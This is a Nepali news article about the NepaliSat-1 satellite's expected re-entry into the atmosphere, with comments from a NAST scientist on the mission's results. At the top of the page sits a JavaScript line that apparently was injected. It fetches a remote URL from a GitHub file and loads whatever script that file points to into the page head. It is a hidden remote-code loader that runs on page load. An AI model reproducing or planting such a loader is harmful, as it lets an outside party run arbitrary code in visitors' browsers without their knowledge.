;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्यूज, काठमाण्डौ | नेपालको पहिलो भू–उपग्रह भनिएको ‘नेपालीस्याट–१’ सेप्टेम्बरको अन्तिम सातासम्म वायुमण्डलमा खस्ने भएको छ । ४ वैशाख, २०७६ मा अमेरिकास्थित भर्जिनिया राज्यमा रहेको प्रक्षेपण केन्द्रबाट प्रक्षेपण गरिएको थियो । त्यसबेला ‘नेपाली स्याट–१’ का साथै श्रीलंकाको ‘रावण–१’ र जापानको ‘युवुसु’ पनि एकैसाथ प्रक्षेपण गरिएको थियो ।
सो नानो स्याटेलाइटको आयु यही अगष्ट २५मा सकिने अनुमान भएपनि अहिलेको अवस्थामा हेर्दा सेप्टेम्बर अन्तिम साता वायुमण्डलमा अनुमान गरिएको नेपाल नेपाल विज्ञान तथा प्रविधि प्रतिष्ठान (नास्ट)ले जनाएको छ ।सुरुमा पृथ्वीबाट ४२० किलोमिटर माथि छोडिएको ‘नेपालीस्याट–१’ अहिले वायुमण्डलको नजिक आइपुगेको छ । करिब पथ्वीबाट सय किलोमिटरको दूरीमा तल आएपछि यो आफैं नष्ट हुन्छ ।
नाष्टका प्राविधि संकाय प्रमुख वैज्ञानिक डा. रवीन्द्र ढकाल ‘नेपालीस्याट–१’ अभियान सफल भएको बताउँछन् ।
नाष्टका प्राविधि संकाय प्रमुख वैज्ञानिक डा. रवीन्द्र ढकालले भने ‘नेपालीस्याट–१’बाट हामीले धेरै कुरा सिक्न पायौं, यसले हामीलाई स्याटेलाइटबारे अध्ययन गर्नेे नेटवर्कमा जोनि पायौं, आफ्नै ग्राउन्ड स्टेसन पनि बनाउन सक्यौं,’उनि भन्छन्,‘नेपाल क्षेत्रको फोटोसहितको डाटा पनि पाउनसक्यौं, नागरिकलाई पनि स्याटेलाइट मिसनबारे आधारभूत ज्ञान दिन परियोजना सफल भयो ।’
तर, अपेक्षा अनुरुप अन्तरिक्ष विज्ञानमा जनशक्तिलाई अभ्यस्त बनाउन भने नसकिएको उनले बताए ।
फेसबुक प्रतिक्रियाहरु